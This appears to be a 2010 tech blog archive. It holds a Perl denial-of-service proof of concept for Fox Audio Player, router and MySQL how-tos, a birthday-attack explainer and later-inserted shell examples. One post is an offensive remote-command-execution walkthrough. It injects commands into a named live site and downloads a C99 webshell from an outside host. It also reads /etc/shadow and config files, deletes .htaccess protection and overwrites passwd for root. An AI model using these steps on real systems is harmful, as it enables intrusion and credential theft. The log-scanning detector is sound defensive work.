#
#########################################################################################
# #
# Title: Fox Audio Player 0.8.0 .m3u Denial of Service Vulnerability #
# Author: 4n0nym0us (Arash Sa'adatfar) #
# Developer: Leandro Nini #
# #
# Software Link: #
# http://www.softpedia.com/get/Multimedia/Audio/Audio-Players/Fox-Audio-Player.shtml #
# Tested On: Windows XP Sp3 32-bit / Windows 7 Ultimate 32-bit #
# #
#########################################################################################
#
#!/usr/bin/perl
# PoC: Fox Audio Player 0.8.0 crashes when it loads a .m3u playlist whose
# single entry is an overlong path (2048 bytes of "A"). Open Crash.m3u in
# the player to trigger the denial of service.
use strict;
use warnings;

my $file = "Crash.m3u";
my $junk = "\x41" x 2048;   # 2048 x 'A'

open(my $fh, '>', $file) or die "Cannot create $file: $!";
print $fh $junk;
close($fh);
print "\n$file file created successfully\n";
http://www.exploit-db.com/exploits/15131/
Monday, September 27, 2010
Thursday, September 16, 2010
Backup/Restore MySQL Database Via SSH
You can back up and restore a MySQL database from an SSH session with mysqldump. It is part of the MySQL package, so it is installed wherever MySQL is.
First, let's see how to back up the database. Run the following command in your SSH session:
mysqldump --opt -u username -p databasename > backupfilename.dump
There is not much to explain: replace username and databasename with your own, and the last argument is the name of the dump file. After you press Enter, mysqldump prompts for the password and then writes the whole database to the file.
Using -p without a password on the command line is deliberate: a password given as an argument shows up in ps output for every user on the box and in your shell history. The dump itself contains every row in plain text, so give it restrictive permissions and delete it from the server once you have copied it off.
Now let's see how to restore the database, which is another simple command:
mysql -u username -p databasename < backupfilename.dump
The arguments are the same as for the backup; the target database must already exist, and the dump is replayed into it.
That is all there is to it: a simple backup and a simple restore.
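As an added example (not from the original post), here is a small POSIX shell wrapper around the two commands above that keeps the password out of the process list, makes the option file and the dump owner-readable only, and refuses database names that contain shell metacharacters. The user, password, database and file names in the usage comment are placeholders.

```shell
#!/bin/sh
# Added example, not part of the original post: a wrapper around
# mysqldump/mysql for backups taken over SSH.
set -u
umask 077   # everything we create (option file, dump) is owner-readable only

# Accept only plain identifiers so a name read from a variable cannot
# inject shell metacharacters into the command line.
valid_name() {
    case "$1" in
        ''|*[!A-Za-z0-9_]*) return 1 ;;
        *) return 0 ;;
    esac
}

# Write a temporary option file holding the credentials. Passing them via
# --defaults-extra-file keeps the password out of `ps` output and out of
# shell history, unlike -pPASSWORD on the command line.
make_cnf() {   # usage: make_cnf user password  -> prints the file path
    cnf=$(mktemp) || return 1
    printf '[client]\nuser=%s\npassword=%s\n' "$1" "$2" > "$cnf"
    printf '%s\n' "$cnf"
}

# backup_db CNF DBNAME OUTFILE : consistent dump, then gzip to OUTFILE.gz.
backup_db() {
    valid_name "$2" || { echo "refusing database name: $2" >&2; return 2; }
    # --single-transaction snapshots InnoDB tables without locking them
    mysqldump --defaults-extra-file="$1" --opt --single-transaction "$2" > "$3" \
        || { rm -f "$3"; return 1; }
    gzip -f "$3"
}

# restore_db CNF DBNAME DUMP.gz : replay a dump into an existing database.
restore_db() {
    valid_name "$2" || { echo "refusing database name: $2" >&2; return 2; }
    gunzip -c "$3" | mysql --defaults-extra-file="$1" "$2"
}

# Usage (all names are placeholders, not values from the post):
#   cnf=$(make_cnf backupuser 'S3cret')
#   backup_db "$cnf" shopdb "shopdb-$(date +%F).sql"
#   restore_db "$cnf" shopdb shopdb-2010-09-16.sql.gz
#   rm -f "$cnf"
```

The option file is removed as soon as the job is done; if you run this from cron, keep a permanent ~/.my.cnf with mode 0600 instead and drop the make_cnf step.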
Thursday, August 19, 2010
Config User Manager On Mikrotik
User Manager is MikroTik's RADIUS-based accounting and AAA package.
You can download the User Manager package from the MikroTik website.
Let's see how to configure User Manager on MikroTik:
First, enable RADIUS for PPP on the router:
/ ppp aaa set use-radius=yes
And set the PPP profile:
/ ppp profile set default local-address=192.168.0.1
Here 192.168.0.1 is the local address the router uses on its PPP links, for example for a PPPoE server or a VPN interface.
Now add a RADIUS client entry so the router consults User Manager for the PPP service:
/ radius add service=ppp address=10.0.0.1 secret=123456789
10.0.0.1 is the IP address of the User Manager (RADIUS) server and 123456789 is the shared secret. Both values are placeholders: use a long random secret, because anyone who knows it can forge RADIUS replies and recover the passwords carried in requests.
Now add an owner to User Manager:
/ tool user-manager customer add login="uman-admin" password="1234" permissions=owner
uman-admin is the login name and 1234 is the password (again a placeholder; pick a strong one, since this account owns the whole User Manager).
Now add the PPP server to User Manager's router list, with the same shared secret you gave the RADIUS client:
/ tool user-manager router add customer=uman-admin ip-address=10.0.0.1 shared-secret=123456789
uman-admin is the owner login, 10.0.0.1 is the address the PPP router sends its RADIUS requests from (in this example User Manager runs on that same router, so it is the address used above), and 123456789 is the shared secret.
That's it. You can access User Manager at:
http://serveripaddress/userman
Sunday, August 15, 2010
Setup Call Manager On Cisco Router
The IOS image on the router must include the Call Manager Express feature (the telephony-service command); without it the commands below are not available.
Let's see how to configure Call Manager on the router.
First, go to configuration mode and enter the telephony-service section:
>enable
#config terminal
(config)#telephony-service
Now set the maximum number of phones (ephones) that may register and the maximum number of directory numbers:
(config-telephony)#max-ephones 2
(config-telephony)#max-dn 2
In my example, we have two phones.
Now set the source address and port the phones register to; 2000 is the default SCCP port:
(config-telephony)#ip source-address 192.168.0.20 port 2000
(config-telephony)#exit
Our source address is 192.168.0.20, which must be an address on the router that the phones can reach, and the port is 2000.
Now give each directory number (ephone-dn) its extension:
(config)#ephone-dn 1
(config-ephone-dn)#number 1234
(config-ephone-dn)#exit
(config)#ephone-dn 2
(config-ephone-dn)#number 5678
(config-ephone-dn)#exit
Now define each physical phone by its MAC address and model, and bind its first button to a directory number (button 1:1 means button 1 rings ephone-dn 1):
(config)#ephone 1
(config-ephone)#mac-address 00aa.aaaa.aaaa
(config-ephone)#type 7902
(config-ephone)#button 1:1
(config-ephone)#exit
(config)#ephone 2
(config-ephone)#mac-address 00bb.bbbb.bbbb
(config-ephone)#type 7902
(config-ephone)#button 1:2
(config-ephone)#exit
Let's check which phones have registered:
#show ephone
Well done, your phones are ready.
Thursday, August 12, 2010
Remote Command Execution (RCE) Vulnerability ::: Exploting In Linux
Remote command execution is a class of vulnerability in which you are able to run operating-system commands on the victim server.
It is usually a high-risk vulnerability, and there are many ways to turn it into access to the server.
It happens whenever the value of a request variable such as "cmd" reaches a function that runs commands, such as system() or passthru() in PHP, without being validated: if you can put your own command into that variable, you have RCE.
There are many ways to use this vulnerability; let's talk about the major ones:
1-Downloading a shell script onto the victim server with a download command:
Linux systems usually carry several commands that can fetch a remote file onto the server. Which ones exist depends on what the host has installed, so try them in turn.
Let's see an example:
We have RCE in this website.
Now we are able to inject into the "cmd" variable.
We want to download our file onto the server, so we use one of these commands:
lwp-download http://[shell]
wget http://shell -O shell.php
fetch -o shell.php -p http://shell
lynx -source http://shell > shell.php
links -source http://shell > shell.php
GET http://shell > shell.php
In my example, wget didn't work, so I tried lwp-download and downloaded the C99 shell script onto the server, then renamed it from c99.txt to c99.php.
http://angelptc.info/index.php?view=help&faq=1&cmd=lwp-download http://sh3llz.org/c99.txt
http://angelptc.info/index.php?view=help&faq=1&cmd=cp c99.txt c99.php
Well done, now we have the C99 shell script at http://angelptc.info/c99.php .
2-Reading files:
2-1:Reading the shadow file: /etc/shadow holds the password hashes and is the most important file on a Linux system. It is normally readable only by root, but sometimes it is world-readable, and then you can read it with: cat /etc/shadow
After that, you can crack the hashes offline and get root access.
2-2:Reading configuration files:
Sometimes the configuration files of websites and content management systems contain useful information. For example, Joomla/Mambo has a configuration section holding the FTP username and password, and site owners sometimes reuse their hosting control panel password as the database password in the configuration file.
Some web applications also store the administrator username and password in files; read them and you have the administrator credentials.
You can read configuration files with the cat command.
2-3:Reading other hosts' web application configuration files:
On a shared server you can also read the configuration files of other hosted sites, if their permissions allow it, to collect FTP credentials, hosting control panel credentials and so on.
3:Removing files: in some web applications the administrator folder is password protected. You can remove the file that enforces the protection and then use the administrator folder.
For example, on the Apache web server the .htaccess file in the folder enforces the protection; delete it with rm -f (rm -rf is only needed for directories) and the administrator folder is open.
Likewise, when a file manager or upload center is password protected, you can remove that protection the same way.
4.Updating files:
Editing a file in place through RCE is awkward, because Linux editors like vi and nano are interactive and need a terminal for their edit and save commands. Instead, replace the whole file.
Replacing files is useful: for example, if the passwd file is writable, you can read it, delete it and then download a new passwd file you edited yourself, which gives you root access.
You can also replace configuration files and the files that store usernames and passwords to gain administrator access.
Steps of updating:
-Read the file and save it to your computer (cat command)
-Remove the file (rm -f command)
-Change the file you downloaded and host it somewhere you can fetch it from
-Download the file to the server and rename it (download commands such as wget, GET, etc.)
5-Renaming uploaded files:
Sometimes you can upload images or text files to the website but not PHP files. With an RCE vulnerability you can rename the uploaded file.
First, rename your shell script to a .jpg, .gif, .txt or similar extension and upload it.
Then use the mv command to change the file name on the server:
mv file.txt file.php
Or anything else along those lines.
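From the defender's side, the download-and-rename sequence described in this post leaves a recognisable trail in the web server's access log. As an added example (not from the original post), the shell functions below pull the cmd= parameter out of Apache-style log lines and flag values that start with the download, copy, rename or delete commands listed above. The log lines are constructed for this example; the IP addresses and the example.net host are placeholders.

```shell
#!/bin/sh
# Added example, not part of the original post: find the command-injection
# pattern described above (a cmd= parameter carrying download/copy/delete
# commands) in Apache-style access logs.

# Constructed sample log (not a real capture); IPs and host are placeholders.
LOG='203.0.113.5 - - [12/Aug/2010:10:01:22 +0000] "GET /index.php?view=help&faq=1 HTTP/1.1" 200 5120
203.0.113.5 - - [12/Aug/2010:10:02:01 +0000] "GET /index.php?view=help&faq=1&cmd=lwp-download%20http://example.net/c99.txt HTTP/1.1" 200 77
203.0.113.5 - - [12/Aug/2010:10:02:09 +0000] "GET /index.php?view=help&faq=1&cmd=cp%20c99.txt%20c99.php HTTP/1.1" 200 12
198.51.100.7 - - [12/Aug/2010:10:03:00 +0000] "GET /c99.php HTTP/1.1" 200 40211
198.51.100.7 - - [12/Aug/2010:10:03:30 +0000] "GET /index.php?view=help&faq=2 HTTP/1.1" 200 5100'

# Print "client-ip cmd-value" for every request whose query string carries cmd=.
extract_cmd() {
    sed -n 's/^\([^ ]*\) .*"[A-Z]* [^ ]*[?&]cmd=\([^ &"]*\).*/\1 \2/p'
}

# Keep only values that begin with one of the tools used in the post to
# fetch, copy, rename or delete files (%20 and + are URL-encoded spaces).
flag_rce() {
    extract_cmd | grep -Ei '^[^ ]+ (wget|curl|lwp-download|fetch|lynx|links|GET|cp|mv|rm|cat|chmod)(%20|\+|$)'
}

# Number of suspicious requests in $LOG.
count_rce() {
    printf '%s\n' "$LOG" | flag_rce | wc -l | tr -d ' '
}

# Distinct client addresses that issued them.
attacker_ips() {
    printf '%s\n' "$LOG" | flag_rce | cut -d' ' -f1 | sort -u
}

# Usage on a real log:  flag_rce < /var/log/apache2/access.log
```

Two of the five sample requests are flagged, both from the same client, and the later GET of /c99.php from a second address is the webshell being used: a flagged cmd= request followed by a hit on a new .php file is the sequence to alert on.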
Wednesday, August 11, 2010
Birthday Attack
Imagine you have a hash function F. F(value) maps an input to an output: if you enter "a", for example, it returns "k". There is no problem so far, but the problem arises when another value produces the same output, for example when entering "z" also returns "k". That is a collision.
A birthday attack is a cryptographic attack based on the birthday paradox, a result from probability theory: in a group of only 23 people there is just over a 50% chance that two share a birthday, because what matters is the number of pairs, not the number of people. The birthday attack looks like a brute-force attack in which the attacker tries to find two different inputs with the same output, but it needs only about the square root of the output space (about 2^(n/2) trials for an n-bit hash) rather than 2^n.
An attacker who can produce such a pair may be able to bypass or subvert authentication, for example by getting one input accepted or signed and then substituting the other.
One of the best-known birthday-attack weaknesses is in the TACACS+ authentication protocol.
Each TACACS+ packet body is encrypted by XORing it with an MD5-derived pad computed from the shared key, the 32-bit session ID, the version and the sequence number, so two different sessions that are assigned the same session ID under the same key reuse the same pad. By the birthday bound that is expected after only about 2^16 sessions rather than 2^32, and an attacker who captures both sessions can XOR the ciphertexts together to cancel the pad.
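To make the paradox concrete, here is an added shell example (not part of the original post) that computes the collision probability for a given number of samples and search space, gives the birthday bound for an n-bit hash, and then finds a real collision on a 16-bit truncation of MD5 by hashing a couple of thousand short messages. The messages msg0, msg1, ... are arbitrary inputs chosen for the example.

```shell
#!/bin/sh
# Added example, not part of the original post: the birthday paradox in
# numbers, and a real collision search on a truncated hash.

# Probability that among n random samples from a space of `space` values at
# least two are equal: 1 - exp(-n(n-1)/(2*space)). For 23 people and 365
# birthdays this gives about 0.50.
collision_prob() {   # usage: collision_prob n space
    awk -v n="$1" -v s="$2" 'BEGIN { printf "%.2f\n", 1 - exp(-n*(n-1)/(2*s)) }'
}

# Number of samples after which a collision becomes likely: roughly
# sqrt(space), i.e. 2^(bits/2) for a `bits`-bit hash. A 16-bit hash falls
# after about 256 tries, not 65536.
birthday_bound() {   # usage: birthday_bound bits
    awk -v b="$1" 'BEGIN { printf "%d\n", sqrt(2^b) }'
}

# MD5 of a message, truncated to the first `hexchars` hex digits
# (4 hex digits = 16 bits). Truncation stands in for a weak hash.
trunc_hash() {       # usage: trunc_hash message hexchars
    if command -v md5sum >/dev/null 2>&1; then
        printf '%s' "$1" | md5sum | cut -c1-"$2"
    else
        printf '%s' "$1" | md5 -q | cut -c1-"$2"   # macOS
    fi
}

# Hash messages msg0..msg(N-1), sort by digest, report the first pair that
# shares a truncated digest. With N=1500 and 16 bits about 17 colliding
# pairs are expected, so a collision is found essentially every time.
find_collision() {   # usage: find_collision N hexchars  -> prints "msgA msgB"
    i=0
    while [ "$i" -lt "$1" ]; do
        printf '%s msg%d\n' "$(trunc_hash "msg$i" "$2")" "$i"
        i=$((i + 1))
    done | sort | awk '$1 == prev { print prevmsg, $2; exit } { prev = $1; prevmsg = $2 }'
}

# Example run:  find_collision 1500 4
```

Sorting the digests is what turns the quadratic pair comparison into an n log n search; the same trick, with a full-width hash and a much larger n, is how real collision searches are organised.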
Tuesday, August 10, 2010
Cisco Router Back To Back Connection
One of the most useful router connections is the back-to-back connection, in which two routers are cabled directly to each other so they can communicate and route packets between each other.
On Cisco routers, a back-to-back connection uses the serial interfaces and a back-to-back (DCE/DTE) serial cable.
Here we want to connect routers R1 and R2 with a back-to-back connection.
Once the cable is attached, it is time to configure the connection on both routers.
When you connect two routers back to back over serial interfaces, one end is the DCE and the other is the DTE.
The DCE end must supply the clock rate; the DTE end receives its clock from the DCE, so no clock rate is set there.
In this example R1 is the DTE, connected to R2 through its Serial 0 interface, and R2 is the DCE, connected to R1 through its Serial 1 interface.
Now let's configure the routers.
Router R1:
If you don't know whether an interface is the DCE or DTE end, check the controller; the output names the cable type, for example "DCE V.35" or "DTE V.35":
show controllers serial 0
Now you can see whether it is the DCE or the DTE.
After that, enable the Serial 0 interface and assign it an IP address. Be careful: Serial 0 on R1 and Serial 1 on R2 must have addresses in the same subnet with the same subnet mask.
>enable
#config terminal
(config)#interface serial 0
(config-if)#ip address 10.0.0.1 255.255.255.0
(config-if)#no shutdown
Now router R1 is ready.
Router R2:
The configuration of R2 is the same as R1, but since it is the DCE end it must also set the clock rate (in bits per second; 56000 is one of the rates Cisco serial interfaces accept):
>enable
#config terminal
(config)#interface serial 1
(config-if)#ip address 10.0.0.2 255.255.255.0
(config-if)#clock rate 56000
(config-if)#no shutdown
Now it is ready. Let's test our connection with ping:
R1 router:
#ping 10.0.0.2
R2 router:
#ping 10.0.0.1